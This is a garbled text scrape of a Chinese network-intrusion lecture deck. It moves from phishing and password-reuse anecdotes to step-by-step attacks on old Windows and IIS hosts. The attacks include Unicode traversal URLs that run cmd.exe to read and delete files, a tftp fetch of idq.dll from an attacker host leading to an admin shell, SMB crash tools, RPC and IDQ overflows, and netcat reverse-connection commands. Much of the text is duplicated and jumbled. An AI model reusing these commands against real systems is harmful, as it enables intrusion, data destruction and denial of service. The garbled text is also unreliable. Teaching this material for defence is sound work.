社会工程学攻击网络钓鱼防范课件.ppt

1、第第7 7讲网络入侵讲网络入侵2 2内容提要内容提要社会工程学攻击社会工程学攻击物理攻击物理攻击破解密码攻击破解密码攻击UnicodeUnicode漏洞攻击漏洞攻击缓冲区溢出漏洞攻击缓冲区溢出漏洞攻击拒绝服务攻击拒绝服务攻击winxpwinxp密码攻击实例密码攻击实例 3 32022-12-24 4 42022-12-24 一组高中学生曾经想要入侵某公司的网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字。这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物

2、和他们配偶名字作为密码。李小姐是某大公司的经理秘书，她工作的电脑上存储着公李小姐是某大公司的经理秘书，她工作的电脑上存储着公司的许多重要业务资料，所以属于公司着重保护的对象，安全司的许多重要业务资料，所以属于公司着重保护的对象，安全部门设置了层层安全防护措施，可以说，她的电脑要从外部攻部门设置了层层安全防护措施，可以说，她的电脑要从外部攻破是根本不可能的事情。为了方便修改设置和查杀病毒，安全破是根本不可能的事情。为了方便修改设置和查杀病毒，安全部门可以直接通过网络服务终端对李小姐的电脑进行全面设置部门可以直接通过网络服务终端对李小姐的电脑进行全面设置。也许贪图方便，维护员与李小姐的日常联系是通

3、过。也许贪图方便，维护员与李小姐的日常联系是通过QQQQ进行。进行。某天李小姐刚打开某天李小姐刚打开QQQQ，就收到维护员的消息：“小李，我小李，我忘记登录密码了，快告诉我，有个紧急的安全设置要做呢！忘记登录密码了，快告诉我，有个紧急的安全设置要做呢！”因为和维护员很熟了，李小姐就把密码发了过去。因为和维护员很熟了，李小姐就把密码发了过去。一夜一夜之间，公司的主要竞争对手掌握了公司的业务！之间，公司的主要竞争对手掌握了公司的业务！由于安全部门距离李小姐的工作地点有好些距离，管理不方便，所以公司让他们直接通过网络来管理机器！他与李小姐之间的联系通过QQ进行。问题偏偏就出在QQ上。作为安全人员，他

4、自然知道密码的重要性，因此他的任何密码都设置得十分复杂，穷举几乎不可能。至于被入侵，那更不可能发生。然而百密仍有一疏百密仍有一疏，他做梦也没想到对手利用QQ的取回密码功能轻易拿到了他的密码。李小姐正是出于对维护员的信任才被对方欺骗的。因为那个在QQ上出现的维护员根本不是公司的维护员本人，而是对手盗取了维护员的QQ，再利用一个小小的信任关系，就轻易取得了登录密码。他在输入提示答案的时候，下意识地输入了心里最重要的那个人的名字。但是对手也知道他心里那个人的名字，所谓的“知己知彼知己知彼”绚丽的QQ秀和一些特色服务，但小马舍不得花钱。好想有免费的Q币。某天一QQ好友给他发来一个URL，还说这个网站通

5、过一定的点击次数提供Q币。如此好的机会小马怎能放过？他根据网站的提示输入了QQ号码和密码完成注册，然后给QQ上的朋友们发了网址。然而等了许久，自己的Q币依然没有动静。第二天，小马想登录QQ时，却发现怎么也登录不上去了QQ密码被人改了。这是最近闹得轰轰烈烈的QQQQ欺骗案件欺骗案件之一。大哥你是不是太搞笑？！改我密码还要5分钟啊？麻烦你快一点好不好！还有QQ中奖要求用户填写密码以待“验证”等伎俩，无论什么手法，最终结局都是一样的，那就是用户的密码被人改掉。如此白痴的骗局，只要有点常识的人都不难理解其中的“笑话”，奇怪的是却屡屡有人上当，究其原因，就是因为国人的贪小便宜心理作祟。这就是著名的“网络

6、钓鱼”！论坛常有帖子：“腾讯公司预留了专用号码作为充值号，此号是自动读取指令的，为了不引起大家的注意，所以这个QQ比较普通，这个QQ一般隐身。只要发送Jerusalum/PLO号码Vesselin Bontchev密码FRALDMUZK Q币数量，然后下线5分钟，等着收Q币吧。”王先生是一家银行的职员，通常都是直接在网络上完成转账操作的。由于他的电脑水平不高，前不久被一个初学者骇客入侵了机器。在请来专业人员修复系统更改密码后，王先生照例登录网络银行为手机缴费，可是才过一会儿他的冷汗就出来了：网络银行登录不进去了！深感大事不妙的王先生去银行办理了相关手续，查账发现账户里的钱已经被人划走了。因为王

7、先生犯了大部分人都会犯的致命错误：通常为了记忆方便，人们因为王先生犯了大部分人都会犯的致命错误：通常为了记忆方便，人们会把会把几处的密码都设置成一样的，例如的，例如QQQQ、E-MAILE-MAIL、FTPFTP、网站等的密码、网站等的密码，而王先生更进一步把所有密码都弄成一样的了，因此入侵者在得到王先生，而王先生更进一步把所有密码都弄成一样的了，因此入侵者在得到王先生的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点的机器登录密码后也就得到了网络银行的密码。正是因为这个普遍心理特点，受害者往往都是被入侵者一锅端了！，受害者往往都是被入侵者一锅端了！因为简单密码和相同密码是大部

8、分人都会碰到的心理弱点 11112022-12-24 12122022-12-24 13132022-12-24 14142022-12-24 15152022-12-24 16162022-12-24 17172022-12-24 18182022-12-24 19192022-12-24 20202022-12-24 21212022-12-24 22222022-12-24 23232022-12-24 24242022-12-24 25252022-12-24 26262022-12-24 27272022-12-24 28282022-12-24 29292022-12-24 303

9、02022-12-24 31312022-12-24 32322022-12-24 33332022-12-24 34342022-12-24 35352022-12-24 36362022-12-24 37372022-12-24 38382022-12-24 39392022-12-24 40402022-12-24 41412022-12-24 42422022-12-24Office Password Remover4343通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。Unicode漏洞是2000-10-17发现的，受影响的版

10、本：1.Microsoft IIS 5.0+Microsoft Win2K系列版本2.Microsoft IIS 4.0+Windows NT 4.0消除该漏洞的方式是安装操作系统的补丁，只要安装了SP1以后，该漏洞就不存在了。微软IIS 4.0和5.0都存在利用扩展扩展UNICODEUNICODE字符取代字符取代/和和而而能利用能利用././目录遍历目录遍历的漏洞。4444使用扫描工具X-Scan来检测Unicode漏洞是否存在。目标主机IP为：172.18.25.109，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置。4545将主机添加到目标地址，扫描

11、结果如图。4646只要是/scripts开头的漏洞都是Unicode漏洞。比如：/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir其其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录4747scripts目录一般系统盘根目录下的Inetpub目录下4848在Windows的目录中，可以使用“./”来访问上一级目录在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的system32了，在system32目录下包含许多重要的系统文件，比如

12、cmd、net命令，可以利用该文件新建用户，删除文件等操作。浏览器地址栏中禁用符号浏览器地址栏中禁用符号“./”./”，但是可以使用符号“/”的Unicode的编码。比如“/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。4949此漏洞从中文IIS4.0+SP6开始，此外还影响中文WIN2k+IIS5.0、中文WIN2k+IIS5.0+SP1，繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版

13、是“%c0%af”。但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，该编码存在于日文版、韩文版等操作系统。%c1%pc%c0%9v%c0%qf%c1%8s%e0%80%af5050利用该漏洞读取出计算机上目录列表，比读取利用该漏洞读取出计算机上目录列表，比读取C C盘的目录盘的目录：http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:5151利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。http:/172.18.25.109/s

14、cripts/.%c0%2f./winnt/http:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inisystem32/cmd.exe?/c+type+c:boot.ini5252利用Unicode可以方便的更改对方的主页，若对方网站的根路径在“C:Initpubwwwroot”（系统默认）下，可以删除该路径下的文件“default.asp”来删除主页，这里的“default.asp”文件是IIS的默认启动页面。使用的语句是：http:/172.18.25.109/scripts/.%c0%2f.

15、/winnthttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+del+c:inetpubwwwro/system32/cmd.exe?/c+del+c:inetpubwwwrootdefault.aspotdefault.asp53535454将cmd.exe文件拷贝到scripts目录，并改名为c.exe：http:/172.18.25.109/scripts/.%c0%2f./winnt/syshttp:/172.18.25.109/scripts/.%c0%2f./winnt/system32/cmd.exe?/

16、c+copy+C:winntsystem32cmd.etem32/cmd.exe?/c+copy+C:winntsystem32cmd.exe+c.exexe+c.exe5555以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为：http:/172.18.25.109/scripts/c.exe?/c+dir+c:http:/172.18.25.109/scripts/c.exe?/c+dir+c:5656在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件，入

17、侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。需要上传一个名为“idq.dll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，它一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序。57575858在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令：“http:/172.18.25.109/scripts/.%c0%2f./winnt/system3http:/172.18.25.

18、109/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”2/cmd.exe?/c+tftp+-i+172.18.25.110+get+idq.dll”，命令其实是“tftp i 172.18.25.110 get idq.dll”意思是从172.18.25.110服务器上获取idq.dll文件59596060拷贝ispc.exe到本地计算机的C:，在命令行下执行：“ispc.exe 172.18.25.109/scripts/idq.dllispc.exe 172.18.25.109/sc

19、ripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限。6161可以在对方计算机上做管理员可以做的一切事情，比如添加用户。建立用户名：Hacker123，密码：Hacker1236262利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户（用户名与密码均为：hax）。经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。工具：cniis.exe，格式是：cniis 172.18.25.109 0参数参数1 1：是目标的IP地址，参数参数2 2：目标系统的补丁号因为172.18.25.109没有打补丁，这里就是0。6

20、363SMB（Session Message Block，会话消息块协议会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。SMB协议版本有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.12版本。利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。6464使用的工具软件是：SMBDie V1.0

21、，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁.攻击需要两个参数：对方的IP地址和对方的机器名6565然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立刻重启或蓝屏，命中率几乎100%66662022-12-24 67672022-12-24 68682022-12-246969远程过程调用RPC（Remote Procedure Call)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务，如图。7070RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具scanm

22、s.exe文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。如果没有安装补丁程序，该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录，现在要检查地址段172.18.25.109到172.18.25.110的主机，执行命令“scanms.exe 172.18.25.109-172.18.25.110”7171利用工具软件attack.exe对172.18.25.109进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权

23、限的用户，并终止了对方的RPC服务。新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，可用OpenRpcSs来给对方重启RPC服务。727273731、利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口。2、它适用于各类操作系统，如对172.18.25.109进行攻击，其系统为Win 2K，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:。3、点击按钮“IDQ溢出”，出现攻击成功的提示框74747575现813端口已经开

24、放，可用nc.exe连接到该端口，将会自动执行刚才发送的命令“dir c:”，其语法：nc.exe-vv 172.18.25.109 813其中-vv是程序的参数，813是目标端口。7676利用nc和snake相互配合可入侵对方计算机。1、首先利用：nc-l-p 813 监听本地的813端口2、启动snake，本地的IP是172.18.25.110，要攻击的计算机的IP地址是172.18.25.109，选择溢出选项中的第一项，设置IP为本地IP地址，端口是8133、设置好以后，点击按钮“IDQ溢出”。4、查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令：将对方计算机的C盘根目录列

25、出来77777878使用nc.exe和webdavx3。先修改本地系统时间到2001年。在命令后面直接跟对方的IP地址。7979若程序不能自动退出，按“CTRL+C”退出。在对方计算机上开了一个7788端口，可用nc入侵对方的计算机。80802022-12-24 81812022-12-24 82822022-12-24 83832022-12-24 84842022-12-24 85852022-12-24 86862022-12-24 87872022-12-24？88882022-12-24 89892022-12-24 90902022-12-24 91912022-12-24 929

26、22022-12-24 93932022-12-24 94942022-12-24 95952022-12-24 96962022-12-24 97972022-12-24 98982022-12-24 99992022-12-24 1001002022-12-24 1011012022-12-24 1021022022-12-24clienttargethandler.agent.DoSICMP Flood/SYN Flood/UDP Flood 1031032022-12-24 1041042022-12-24 1051052022-12-24 1061062022-12-24 10710

27、72022-12-24 1081082022-12-24 1091092022-12-24 1101102022-12-24 1111112022-12-24 1121122022-12-24 1131132022-12-24 1141142022-12-24 1151152022-12-24 1161162022-12-24 1171172022-12-24 1181182022-12-24 1191192022-12-24 1201202022-12-24 1211212022-12-24 1221222022-12-24 1231232022-12-24 1241242022-12-24 1251252022-12-24